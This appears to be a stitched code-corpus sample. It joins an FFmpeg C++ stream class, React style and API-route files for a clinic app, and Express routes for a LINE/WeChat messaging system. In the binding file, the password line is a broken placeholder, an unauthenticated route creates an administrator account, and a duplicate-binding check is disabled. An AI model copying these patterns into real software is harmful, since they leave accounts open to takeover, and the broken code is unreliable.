extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
using namespace log4cplus;
using namespace std;
using namespace boost;
enum StreamType {
AUDIO, VIDEO, UNKNOWN
};
typedef shared_ptr<AVPacket> PacketPtr;
class FFmpegStream {
protected:
AVStream* avStream;
AVCodec* codec;
AVFormatContext* formatContext;
int bps;
int nextPts;
bool start;
double pts;
int streamIndex;
Logger logger;
public:
static const float dtsDeltaThreshold = 10;
FFmpegStream(AVStream* avs, AVFormatContext* fc, string streamName,
int sIdx);
void adjustTimeStamps(AVPacket pkt);
virtual StreamType getType() {
return UNKNOWN;
}
virtual string getCodec() {
return string(codec->name);
}
virtual ~FFmpegStream() {
}
template<class DecodedDataType>
shared_ptr<DecodedDataType> decode(PacketPtr);
int getStreamIndex() {
return streamIndex;
}
virtual FFmpegStream* clone() const = 0;
};
FFmpegStream* new_clone(FFmpegStream const& other);
#endif /* FFMPEGSTREAM_H_ */
<file_sep>/src/streams/FFmpegStream.cpp
/*
* FFMpegStream.cpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#include "FFmpegStream.hpp"
using namespace std;
FFmpegStream::FFmpegStream(AVStream* avs, AVFormatContext* fc,
string streamName, int sIdx) :
avStream(avs), formatContext(fc), streamIndex(sIdx), logger(
Logger::getInstance(LOG4CPLUS_TEXT(streamName))) {
codec = avcodec_find_decoder(avs->codec->codec_id);
int open = avcodec_open(avStream->codec, codec);
if (open < 0) {
throw new TranscodeException("Failed to open codec", open);
}
bps = av_get_bytes_per_sample(avStream->codec->sample_fmt) >> 3;
pts = avStream->avg_frame_rate.num ?
-avStream->codec->has_b_frames * AV_TIME_BASE
/ av_q2d(avStream->avg_frame_rate) :
0;
nextPts = AV_NOPTS_VALUE;
start = 1;
}
;
void FFmpegStream::adjustTimeStamps(AVPacket pkt) {
if (pkt.dts != AV_NOPTS_VALUE)
pkt.dts += av_rescale_q(0, AV_TIME_BASE_Q, avStream->time_base);
if (pkt.pts != AV_NOPTS_VALUE)
pkt.pts += av_rescale_q(0, AV_TIME_BASE_Q, avStream->time_base);
//input file scaling
// if (pkt.stream_index < nb_input_files_ts_scale[file_index]
// && input_files_ts_scale[file_index][pkt.stream_index]) {
// if (pkt.pts != AV_NOPTS_VALUE)
// pkt.pts *= input_files_ts_scale[file_index][pkt.stream_index];
// if (pkt.dts != AV_NOPTS_VALUE)
// pkt.dts *= input_files_ts_scale[file_index][pkt.stream_index];
// }
if (pkt.dts != AV_NOPTS_VALUE && nextPts != AV_NOPTS_VALUE
&& (formatContext->iformat->flags & AVFMT_TS_DISCONT)) {
int64_t pkt_dts = av_rescale_q(pkt.dts, avStream->time_base,
AV_TIME_BASE_Q);
int64_t delta = pkt_dts - nextPts;
if ((FFABS(delta) > 1LL * dtsDeltaThreshold * AV_TIME_BASE
|| pkt_dts + 1 < pts)) { // && !copy_ts - invesitgate copy timestamps
//input_files_ts_offset[ist->file_index] -= delta;
//ffmpeg.c 2891 add this back in
LOG4CPLUS_WARN(logger, "Timestamp discontinuity " << delta);
pkt.dts -= av_rescale_q(delta, AV_TIME_BASE_Q, avStream->time_base);
if (pkt.pts != AV_NOPTS_VALUE)
pkt.pts -= av_rescale_q(delta, AV_TIME_BASE_Q,
avStream->time_base);
}
}
}
FFmpegStream* new_clone(FFmpegStream const& other) {
return other.clone();
}
<file_sep>/src/streams/StreamFactory.hpp
/*
* StreamFactory.hpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef STREAMFACTORY_HPP_
#define STREAMFACTORY_HPP_
#include "FFmpegAudioStream.hpp"
#include "FFmpegVideoStream.hpp"
#include "../FFmpegEncodingContainer.hpp"
#include <set>
using namespace std;
class StreamFactory {
public:
static FFmpegVideoStream makeVideoStream(FFmpegEncodingContainer container,
int streamId, bool copy, int frameWidth, int frameHeight,
float frameAspectRatio);
static FFmpegVideoStream makeVideoStream(string codec, int id,
AVRational frameRate, int frameWidth, int frameHeight,
PixelFormat framePixFmt);
static CodecList& getCodecList() {
static CodecList codecList; // constructor runs once, when someone first needs it
return codecList;
}
};
#endif /* STREAMFACTORY_HPP_ */
| e6bd3db5e14d979d2621e2fd42c3cf1de1260ca7 | [
"C++"
] | 28 | C++ | sumo/transPlus | 14e754e5bb610225c9c48b9b6d811f858df9b13f | 0cc811d9dec061571f0dc12cf4b3346f794532c4 |
refs/heads/master | <file_sep>import { Style } from '../../components/customForm/customForm';
export const form : Style = {
fontSize : 18,
color: 'white',
backgroundColor: 'Transparent',
margin : 0,
fontFamily: 'Monaco',
}
export const formPopUp : Style = {
fontSize : 18,
color: 'black',
backgroundColor: 'Transparent',
margin : 0,
fontFamily: 'Monaco',
}<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
padding : 5,
display: 'flex',
flexDirection: 'row',
margin: 0,
backgroundColor: 'red',
},
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
import { Style } from './customButton';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: (props : Style ) => props.backgroundColor,
padding: (props : Style ) => props.margin,
borderRadius: 5
},
typography: {
color: (props : Style ) => props.color,
fontFamily: 'Monaco',
borderRadius:2,
fontSize: (props : Style ) => props.fontSize,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
alignItems:'center',
justifyContent: 'center',
display:'flex',
margin : '10%',
},
image: {
borderRadius:30,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : (props : any) => props.fontSize,
backgroundColor : (props : any) => props.backgroundColor,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
import { Style } from './customForm';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: (props: Style) => props.backgroundColor,
padding: (props: Style) => props.margin,
},
typography: {
color: (props: Style) => props.color,
fontFamily: (props: Style) => props.fontFamily,
borderRadius: 2,
fontSize: (props: Style) => props.fontSize,
},
box: {
width: '80%',
minWidth: 400,
margin: 5,
padding: 5,
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'column',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
padding : 5,
display: 'flex',
flexDirection: 'row',
margin: 0,
backgroundColor: '#037682',
alignItems: 'center',
},
link: {
backgroundColor : 'white',
margin : 10,
color: 'black',
padding: 10,
fontFamily: 'Monaco',
borderRadius:10,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : 18,
color: 'white',
margin : 0,
fontFamily: 'Monaco',
},
typographyTitle : {
fontSize : 25,
color: 'white',
margin : 3,
fontFamily: 'Monaco',
},
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
width: '95%',
margin : 'auto',
marginTop: '5%',
backgroundColor: '#037682',
borderRadius:10,
},
button : {
fontSize : 12,
color: 'white',
margin : 5,
fontFamily: 'Monaco',
},
link: {
float: 'none',
color: 'black',
textDecoration : 'none',
display: 'block',
textAlign: 'left',
padding: 12,
"&:hover": {
background: "#efefef"
}
},
dropdown: {
display: 'block',
position: 'absolute',
backgroundColor : '#f9f9f9',
minWidth : 160,
zIndex: 1,
},
searchBarForm :{
minHeight : 42,
minWidth : 170,
height : '60%',
},
searchBar : {
minWidth : 170,
height : '90%',
minHeight : 40,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'column',
margin: 2,
},
typography: {
fontSize: 20,
color: 'black',
padding: 10,
fontFamily: 'Monaco',
fontWeight: 'bold'
},
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
margin : 0,
backgroundColor : 'green'
},
title :{
backgroundColor: 'red',
}
})
);
<file_sep>import { Style } from '../../components/customButton/customButton';
export const subButton : Style = {
backgroundColor : 'transparent',
color : 'black',
fontSize: 14,
margin : 2,
}
export const button : Style = {
backgroundColor : 'white',
color : 'black',
fontSize: 18,
margin : 5,
}
export const titleButton : Style = {
backgroundColor : 'white',
color : 'black',
fontSize: 25,
margin : 5,
}
export const listButton : Style = {
backgroundColor : '#02525b',
color : 'white',
fontSize: 18,
margin : 2,
}<file_sep>import { UserType } from "../../components/userLogin/userLogin";
const base = 'http://localhost:3001/api/v1';
export const api = {
register: {
patient: base + '/patients/auth/register',
caregiver: base + '/caregivers/auth/register',
secretary: base + '/secretaries/auth/register',
},
doctorPatient : base + '/caregivers/view/patients',
patients: base + '/patients',
caregivers: base + '/caregivers',
login: base + '/auth/login',
welcome: base + '/welcome',
Rooms: base + '/rooms',
getpatient: base + '/patients',
rooms : {
rooms : base + '/rooms',
},
delete: {
patient: base + '/patients/delete/:id?id=',
},
details: {
patient: base + '/patients/view/details',
caregiver: base + '/caregivers/view/details',
secretary: base + '/secretaries/view/details',
},
update: {
patient: base + '/patients/update/:id?id=',
caregiver: base + '/caregivers/update/:id?id=',
secretary: base + '/secretaries/update/:id?id=',
},
search : base + '/search/:request?request=',
getUserType : base + "/users/get/:token",
healthfile : {
view : base + '/healthfile/view/:id?id=',
create : base + '/healthfile/create/:id?id=',
update: base + '/healthfile/update/:id?id=',
delete: base + '/healthfile/delete/:id?id=',
},
consumable : {
viewall : base + '/consumable',
create : base + '/consumable',
update: base + '/consumable/update/:id?id=',
delete: base + '/consumable/delete/:id?id=',
viewspecific: base + '/consumable/view/:id?id=',
},
consumableType : {
viewall : base + '/consumableType',
create : base + '/consumableType',
update: base + '/consumableType/update/:id?id=',
delete: base + '/consumableType/delete/:id?id=',
viewspecific: base + '/consumableType/view/:id?id=',
},
equipment : {
view : base + '/rooms/equipments',
create : base + '/rooms/equipments/add/:id?id=',
update: base + '/rooms/equipments/update',
delete: base + '/rooms/equipments/delete/:id?id=',
},
equipmentType : {
view : base + '/rooms/equipments/type',
create : base + '/rooms/equipments/type/add',
update: base + '/rooms/equipments/type/update',
delete: base + '/rooms/equipments/type/delete/:id?id=',
}
}
// export const GetRoombyId = (room: Room) => {
// return api.Rooms + '/view/:id?id=' + healthFile.id;
// }
export const getRegister = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.register.caregiver;
break;
case 'secretary':
return api.register.secretary;
break;
case 'patient':
return api.register.patient;
break;
}
}
export const getDetails = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.details.caregiver;
break;
case 'secretary':
return api.details.secretary;
break;
case 'patient':
return api.details.patient;
break;
}
}
export const getUpdate = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.update.caregiver;
break;
case 'secretary':
return api.update.secretary;
break;
case 'patient':
return api.update.patient;
break;
}
}
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : 18,
color: 'white',
margin : 0,
fontFamily: 'Monaco',
},
typographyTitle : {
fontSize : 25,
color: 'white',
margin : 3,
fontFamily: 'Monaco',
},
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
width: '95%',
margin : 'auto',
marginTop: '5%',
backgroundColor: '#037682',
borderRadius:10,
},
button : {
fontSize : 12,
color: 'white',
margin : 5,
fontFamily: 'Monaco',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: 'white',
padding: 10,
},
typography: {
color: 'black',
fontFamily: 'Monaco',
borderRadius: 2,
fontSize: 20
},
background: {
height: '90vh',
},
content: {
backgroundColor: '#4e9fa7',
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'row',
height: '75vh',
margin: 10,
borderRadius: 10,
},
appointements: {
width: '50%',
margin: 15
},
personalData: {
width: '50%',
margin: 15
},
box : {
height: '100vh',
width: '100vw',
margin: 'auto',
display: 'flex',
flexDirection: 'column',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
display: 'flex',
justifyContent: 'space-between',
alignItems: 'center', // To be vertically aligned
width: '100%',
margin: 0,
backgroundColor: '#037682',
},
typography: {
fontSize: 35,
fontWeight: 'bold',
marginLeft: 10,
marginRight: 10
},
button: {
fontSize: 18,
fontWeight: 'bold',
borderRadius: 10,
marginLeft: 10,
marginRight: 10,
backgroundColor: '#1c838e',
margin: 10
}
})
);
| e012bc9d3230bc85e295744ac094e6cf3d2024dd | [
"TypeScript"
] | 16 | TypeScript | Dieselow/archi-company-project-web | 94a9b97119a939b9296bf57d874ba5f70bf7b431 | ced87447d812cfb7536d4fc25d8138915cb75389 |
refs/heads/master | <repo_name>jkes900136/messagingSystem<file_sep>/src/templateWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as messageTemplateService from "./services/messageTemplateService"
import * as catalogService from "./services/catalogService"
import { Catalog, MessageTemplate } from "./model"
import * as XLSX from 'xlsx'
const router = Router()
/**
 * POST /importTemplate
 * Imports message templates from a base64-encoded spreadsheet (req.body.file).
 * Row 0 is the header; each data row is [title, content, thumb]. Templates are
 * deduplicated by content and linked into a Catalog resolved by (name, userId).
 */
router.post("/importTemplate", async (req, res) => {
    let base64String = req.body.file;
    // Strip any "data:...;base64," data-URL prefix before decoding.
    let base64Image = base64String.split(';base64,').pop();
    /* data is a node Buffer that can be passed to XLSX.read */
    let workbook = XLSX.read(base64Image, { type: 'base64' });
    // header: 1 yields rows as raw (possibly sparse) arrays.
    let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
    let userId = ""
    let name: string = ""
    let type: Catalog['type'] = "static"
    let messageTemplateUploads = new Array<{ title: string, content: string, thumb: string }>()
    if (req.body.hasOwnProperty("userId")) {
        userId = req.body.userId
    }
    if (req.body.hasOwnProperty("name")) {
        name = req.body.name
    }
    if (req.body.hasOwnProperty("type")) {
        type = req.body.type
    }
    // Skip the header row; keep rows with at least two columns.
    for (let i = 1; i < data.length; i++) {
        let cols = data[i]
        if (cols.length <= 1) {
            cols[1] = ""
        }
        if (cols.length >= 2) {
            // Fix: guard every cell — sheet_to_json with { header: 1 } can yield
            // sparse rows where cols[0] / cols[2] are undefined, which previously
            // crashed on .toString(). Also dropped an unused `newData` temp.
            messageTemplateUploads.push({
                title: (cols[0] || "").toString().trim(),
                content: (cols[1] || "").toString().trim(),
                thumb: (cols[2] || "").toString().trim()
            })
        }
    }
    // Start from a fresh catalog; reuse the stored one if (name, userId) already exists.
    let newCatalog: Catalog = { id: uuidv4(), name: name, messageId: [], userId: userId, index: new Date().getTime(), type: type }
    const catalogSnapshot = await catalogService.getCatalogByNameAndUserId(name, userId)
    if (catalogSnapshot.length > 0) {
        newCatalog.id = catalogSnapshot[0].id
        newCatalog.messageId = catalogSnapshot[0].messageId
        newCatalog.index = catalogSnapshot[0].index
        newCatalog.type = catalogSnapshot[0].type
    }
    for (const messageTemplateUpload of messageTemplateUploads) {
        // Check whether a template with identical content already exists.
        const messageTemplateSnapshot = await messageTemplateService.getMessageTemplateByContent(messageTemplateUpload.content)
        if (messageTemplateSnapshot.empty) {
            console.log("====不存在====")
            let newMessageTemplate: MessageTemplate = {
                id: uuidv4(),
                title: messageTemplateUpload.title,
                content: messageTemplateUpload.content,
                thumb: messageTemplateUpload.thumb,
                type: ""
            }
            if (newCatalog.messageId.indexOf(newMessageTemplate.id) < 0) {
                newCatalog.messageId.push(newMessageTemplate.id)
            }
            // Fix: await the write so failures surface before the catalog is saved.
            await messageTemplateService.setMessageTemplate(newMessageTemplate)
        } else {
            // Existing template: refresh its fields from the upload when provided.
            let newMessageTemplate = messageTemplateSnapshot.docs[0].data() as MessageTemplate
            if (messageTemplateUpload.title) {
                newMessageTemplate.title = messageTemplateUpload.title
            }
            if (messageTemplateUpload.content) {
                newMessageTemplate.content = messageTemplateUpload.content
            }
            if (messageTemplateUpload.thumb) {
                newMessageTemplate.thumb = messageTemplateUpload.thumb
            }
            if (newCatalog.messageId.indexOf(newMessageTemplate.id) < 0) {
                newCatalog.messageId.push(newMessageTemplate.id)
            }
            await messageTemplateService.setMessageTemplate(newMessageTemplate)
        }
    }
    console.log("newCatalog:", newCatalog)
    await catalogService.setCatalog(newCatalog).then(success => {
        res.sendStatus(200)
    }).catch(err => {
        res.sendStatus(403)
    })
})
// GET /getCatalogByTypeAndUserId
// Looks up a catalog by its name (query "type") and owner (query "userId");
// replies with the first match, or 403 when none exists.
router.get("/getCatalogByTypeAndUserId", async (req, res) => {
    const catalogName = req.query.type
    const ownerId = req.query.userId
    console.log(catalogName)
    const matches = await catalogService.getCatalogByNameAndUserId(catalogName, ownerId)
    if (matches.length === 0) {
        res.sendStatus(403)
        return
    }
    res.status(200).send(matches[0])
})
// POST /updateCatalog
// Upserts the catalog document supplied in the request body.
router.post("/updateCatalog", async (req, res) => {
    const payload = req.body as Catalog
    console.log(JSON.stringify(payload, null, 4))
    if (!payload) {
        res.sendStatus(403)
        return
    }
    const catalogToStore: Catalog = { ...payload }
    await catalogService.setCatalog(catalogToStore)
    res.sendStatus(200)
})
// DELETE /deleteCatalog/:catalogId
// Removes the catalog identified by the route parameter; 403 on failure.
router.delete("/deleteCatalog/:catalogId", async (req, res) => {
    const catalogId = req.params.catalogId as string
    try {
        await catalogService.deleteCatalog(catalogId)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
// POST /updateTemplate
// Upserts a message template; only templates with non-empty content are accepted.
router.post("/updateTemplate", async (req, res) => {
    const templateUpload = req.body as MessageTemplate
    console.log(JSON.stringify(templateUpload, null, 4))
    if (templateUpload.content == "") {
        res.sendStatus(403)
        return
    }
    console.log("====建立====", templateUpload.title)
    const templateToStore: MessageTemplate = { ...templateUpload }
    await messageTemplateService.setMessageTemplate(templateToStore)
    res.sendStatus(200)
})
// DELETE /deleteTemplate/:messageId
// Removes the message template identified by the route parameter; 403 on failure.
router.delete("/deleteTemplate/:messageId", async (req, res) => {
    const templateId = req.params.messageId as string
    try {
        await messageTemplateService.deleteMessageTemplate(templateId)
        res.sendStatus(200)
    } catch (err) {
        res.sendStatus(403)
    }
})
export default router<file_sep>/src/pubSubEvent.ts
import { Router } from "express"
import * as PubSub from "@google-cloud/pubsub"
import { pubsubConfig, pubsubSwitch, PORT } from './config';
import { Event, PubSubEvent, Member, MessageTemplate, User, EventResult, Receiver } from './model'
import axios from "axios"
import * as eventService from './services/eventService'
import * as memberService from "./services/memberService"
import { v4 as uuidv4 } from "uuid"
// Pub/Sub client authenticated via the configured service-account key file.
const googlePubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath });
// Fully-qualified topic name for outgoing message events.
const messageTopicName = pubsubConfig.topicName + pubsubConfig.messageTopicName
const router = Router()
/**
 * POST /createEvent
 * Builds an Event from the request body, upserts any unknown receivers into the
 * Member collection, persists the event, and responds with the new event id.
 * Publishing to Pub/Sub is a separate step (POST /publish).
 */
router.post("/createEvent", async (req, res) => {
    console.log("===req.body.receiver===", req.body.receiver)
    let receivers: Member[] = req.body.receivers
    let updatePromise = new Array<Promise<any>>()
    // Defaults; individual fields are overridden from the body below.
    let eventObj: Event = {
        id: uuidv4(),
        timeStamp: new Date().getTime(),
        receivers: receivers,
        sender: { id: "system", name: "system", email: "", role: "staff" },
        content: "",
        channel: "WeChat",
        urls: [],
        thumb: ""
    }
    if (req.body.hasOwnProperty("sender")) {
        eventObj.sender = req.body.sender
    }
    if (req.body.hasOwnProperty("content")) {
        eventObj.content = req.body.content
    }
    if (req.body.hasOwnProperty("type")) {
        eventObj.type = req.body.type
    }
    if (req.body.hasOwnProperty("channel")) {
        eventObj.channel = req.body.channel
    }
    if (req.body.hasOwnProperty("urls")) {
        eventObj.urls = req.body.urls
    }
    if (req.body.hasOwnProperty("thumb")) {
        eventObj.thumb = req.body.thumb
    }
    // Note: the original also read body.period/location/address into locals that
    // were never used; that dead extraction has been removed.
    console.log("===eventObj===", JSON.stringify(eventObj, null, 4))
    // Fix: the original used receivers.forEach(async ...), so Promise.all ran
    // before any lookup finished and no member was ever awaited. Iterate
    // sequentially so every upsert is collected before we wait on them.
    for (const receiver of receivers) {
        if (receiver.hasOwnProperty("groupId")) {
            // Group receivers are keyed by their group id.
            receiver['id'] = receiver.groupId
        }
        const memberSnapshot = await memberService.getMemberByIdAndName(receiver.id, receiver.name)
        if (memberSnapshot.empty) {
            const newMember: Member = {
                ...receiver
            }
            // Original nested check was redundant: when "id" is absent the inner
            // falsy test is always true, so a single check suffices.
            if (!newMember.hasOwnProperty("id")) {
                newMember.id = uuidv4()
            }
            // Only persist receivers that carry contact info.
            if (receiver.hasOwnProperty('mobilePhone')) {
                updatePromise.push(memberService.setMember(newMember).then(() => console.log("===create member success===")))
            }
        } else {
            console.log("== member exist===")
        }
    }
    try {
        await Promise.all(updatePromise)
        // Fix: the original fired eventService.createEvent(...) as a floating
        // promise inside .then, so its failures bypassed the .catch; awaiting it
        // here routes errors to the 403 branch.
        await eventService.createEvent(eventObj)
        res.status(200).send(eventObj.id)
    } catch (error) {
        console.log(error)
        res.sendStatus(403)
    }
})
// POST /publish
// Triggers a Pub/Sub publish for an already-created event id.
router.post("/publish", async (req, res) => {
    if (!req.body.hasOwnProperty("id")) {
        res.sendStatus(403)
        return
    }
    console.log("messagePub:", req.body.id)
    messagePub(req.body.id)
    res.sendStatus(200)
})
// Publishes a minimal PubSubEvent { id, timeStamp } onto the message topic.
// Fire-and-forget: the publish promise is not awaited.
const messagePub = (id: string) => {
    const payload: PubSubEvent = {
        id: id,
        timeStamp: new Date().getTime()
    }
    console.log("===messagePub data===", payload)
    const payloadBuffer = Buffer.from(JSON.stringify(payload));
    googlePubsub.topic(messageTopicName).publisher().publish(payloadBuffer)
    console.log("===messagePub success===")
}
/**
 * Message-topic subscriber. Each Pub/Sub message carries a PubSubEvent
 * { id, timeStamp }: the handler loads the stored Event and its receivers,
 * rebuilds a MessageTemplate from the event's fields, and forwards everything
 * to the local /push/pushMessage endpoint. The message is always acked.
 */
if (pubsubSwitch) {
    const messageSubscription = googlePubsub.subscription(pubsubConfig.subName + pubsubConfig.messageSubName);
    messageSubscription.on('message', async messageSub => {
        let event: PubSubEvent = JSON.parse(Buffer.from(messageSub.data, 'base64').toString())
        console.log("=====message Subscription==========", event)
        if (event.hasOwnProperty('id')) {
            console.log("event", event)
            let eventData = await eventService.getEvent(event.id)
            const receivers: Receiver[] = await eventService.getEventServices(event.id)
            // Default sender, used when the stored event carries none.
            let sender: User = {
                id: "system",
                name: "系統",
                email: "<EMAIL>",
                role: "staff"
            }
            // Fix: the original initialized `messages` once and then overwrote it
            // unconditionally; the dead first initializer (and a large block of
            // commented-out code) has been removed.
            let messages: MessageTemplate = {
                id: "",
                title: "",
                content: "",
                urls: [],
                thumb: "",
                channel: eventData.channel as MessageTemplate['channel'],
                type: ""
            }
            if (eventData.hasOwnProperty("content") && eventData.content != "") {
                messages.content = eventData.content
            }
            if (eventData.hasOwnProperty("type") && eventData.type != "") {
                messages.type = eventData.type
            }
            if (eventData.hasOwnProperty("sender")) {
                // Sender may be stored as a full User object or a bare name.
                if (eventData.sender.hasOwnProperty("id")) {
                    sender = eventData.sender
                } else {
                    sender.name = eventData.sender.toString()
                }
            }
            if (eventData.hasOwnProperty("urls")) {
                messages.urls = eventData.urls
            }
            if (eventData.hasOwnProperty("thumb")) {
                messages.thumb = eventData.thumb
            }
            console.log("===messages===", messages)
            axios.post(`http://localhost:${PORT}/push/pushMessage`, {
                sender: sender,
                messageObj: messages,
                receivers: receivers
            }).then(success => {
                console.log("======Message Send Success==========", success.data)
            }).catch(err => {
                console.log("======Message Send Err==========", err)
            })
        } else if (event.hasOwnProperty('receivers')) {
            // Legacy payload shape; intentionally a no-op today.
        }
        messageSub.ack()
    })
}
export default router<file_sep>/src/bindingWS.ts
import { Router } from "express"
import * as structureService from './services/structureService'
import * as loginService from './services/loginService';
import * as memberService from './services/memberService'
import { pushMessage } from './services/chatbotService';
import * as driveService from "./services/driveService"
import { Client, validateSignature, WebhookEvent, Message, TextMessage, TemplateMessage } from "@line/bot-sdk"
import * as config from './config';
import * as receiverService from './services/receiverService';
import * as admin from 'firebase-admin';
import { IssueOrganization, GroupOrganization, Group, MemberOrganization, Member } from './model';
const uuidv4 = require('uuid').v4;
const router = Router()
/**
 * POST /Binding — entry point for chat-platform binding actions.
 * Dispatches on req.body.action ("fileVersion" | "productInfo" | "login" |
 * "groupBinding"); a null or "guest" lineId is answered with a bare 200.
 * NOTE(review): in the "login"/"groupBinding" cases, after a rejection the
 * catch already sends a 403 but `res.send(result)` still runs afterwards —
 * a potential double-send; confirm whether that is intended.
 */
router.post('/Binding', async function (req, res) {
    const applicationName = config.appName
    const lineId = req.body.lineId
    const data = req.body.data
    // NOTE(review): `name` is read but never used below.
    const name = req.body.name
    const action = req.body.action
    console.log("---data", data)
    console.log("---lineId", lineId)
    console.log("---action", action)
    let result
    if (lineId != null && lineId != "guest") {
        switch (action) {
            case "fileVersion":
                // Push a file-version card back to the user (synchronous helper).
                result = fileVersion(lineId, data)
                res.send(result)
                break
            case "productInfo":
                // Push a product-document card back to the user.
                result = productInfo(lineId, data)
                res.send(result)
                break
            case "login":
                // Bind this platform id to an account; resolves to a Firebase token.
                result = await login(lineId, data, applicationName).catch(err => {
                    res.status(403).send(err)
                })
                console.log("result", result)
                res.send(result)
                break
            case "groupBinding":
                // Attach a Line group to the member's lineGroup list.
                result = await groupBinding(lineId, data, applicationName).then(() => {
                }).catch(err => {
                    res.status(403).send(err)
                })
                console.log("result", result)
                res.send(result)
                break
            default:
                break
        }
    } else {
        res.sendStatus(200)
    }
});
/**
 * POST /initialization — bootstraps a hard-coded system-administrator account
 * (Firebase user + login/registration flow).
 */
router.post('/initialization', async function (req, res) {
    const email = "<EMAIL>"
    const mobile = "0911222333"
    const name = "系統管理員"
    await initialization({ email, mobile, name }).then(DBInfo => {
        console.log("DBInfo", DBInfo)
        res.status(200).send(DBInfo)
    }).catch(err => {
        res.status(403).send(err)
    })
});
/**
 * Binds a platform id (Line/WeChat) to an account and registers it.
 * Resolves with the Firebase custom token produced by `registeration`;
 * rejects with a user-facing message when credentials are missing.
 */
const login = async (lineId: string, data: any, applicationName: string) => {
    const personalId = ""
    // NOTE(review): "<PASSWORD>" looks like a redacted credential placeholder —
    // this line cannot compile as-is; restore the original expression
    // (presumably something read from `data`).
    let password = <PASSWORD>
    if (password) {
        return memberService.getMemberByAnyId(lineId).then(snapshot => {
            if (snapshot.size < 1) { // check how many accounts already use this id
                // id not yet bound — proceed straight to registration
                return registeration(lineId, personalId, password, applicationName)
            } else {
                // id already bound at least once; re-binding is currently allowed
                // (the rejection below is intentionally commented out)
                let users = []
                snapshot.forEach(doc => users.push(doc.data()))
                for (let i = 0; i < users.length; i++) {
                    if (!users[i]["unfollow"] || users[i]["unfollow"] == false) {
                        console.log(`${lineId}重複綁定,PID:[${personalId}]`)
                        // return Promise.reject("此帳號已被綁定, 請勿重複登入")
                    }
                }
                return registeration(lineId, personalId, password, applicationName)
            }
        })
        // return existSale(lineId, personalId, password)
        // return registeration(lineId, personalId, password, applicationName)
    } else
        return Promise.reject("請輸入帳號密碼")
}
/**
 * Registers a platform id against the account returned by tempLogin:
 * stamps binding metadata on the record, provisions the member's Drive
 * folder, issue/contact-book root nodes, sends a welcome message, persists
 * the member, and resolves with a Firebase custom token.
 * The platform is inferred from the id's length (LINE vs WECHAT).
 */
const registeration = (platformId, personalId, password, applicationName) => {
    return loginService.tempLogin(personalId, password, platformId).then(async result => {
        // Stamp the binding fields for whichever platform this id belongs to.
        if (platformId.length == config.idLength.LINE) {
            result["lineId"] = platformId
            result["lineBindingAt"] = +Date.now()
        } else if (platformId.length == config.idLength.WECHAT) {
            result["wechatId"] = platformId
            result["wechatBindingAt"] = +Date.now()
        }
        result["errorCounter"] = 0
        result["isActive"] = true
        result["unfollow"] = false
        // Backfill fields older records may lack.
        if (!result.hasOwnProperty("path")) { result["path"] = "" }
        if (!result.hasOwnProperty("lineId")) { result["lineId"] = "" }
        if (!result.hasOwnProperty("wechatId")) { result["wechatId"] = "" }
        return driveService.authorize().then(auth => {
            const now = +Date.now()
            let newUid = uuidv4()
            // Default personal root nodes (contact book / issues / groups).
            // NOTE(review): all three share the same `newUid`; confirm intended.
            let companyInfo: MemberOrganization = {
                parentId: result.id, name: "我的通訊錄", type: "department", id: newUid
            }
            let structureInfo: IssueOrganization = {
                parentId: result.id, name: "我的議題", type: "system", id: newUid
            }
            let groupInfo: GroupOrganization = {
                parentId: result.id, name: "我的群組", type: "system", id: newUid
            }
            return driveService.getFileByName(result.id).then(async folders => {
                if (folders.empty) {
                    // First login: create the member's Drive folder plus an archive subfolder.
                    await driveService.createFile(auth, result.id, config.personalRootFolderId, "folder", now).then(folderId => {
                        console.log("folderId:", folderId)
                        driveService.createFile(auth, "保存", folderId, "folder", now).then(() => {
                        }).catch(err => {
                            console.log("error:", err.response)
                        })
                    }).catch(err => {
                        console.log("error:", err.response)
                    })
                }
                // Create the "my issues" root only if it does not exist yet.
                await structureService.getStructureByParentId(result.id).then(issueSnapshot => {
                    if (issueSnapshot.empty) {
                        structureService.setStructure(structureInfo)
                    }
                })
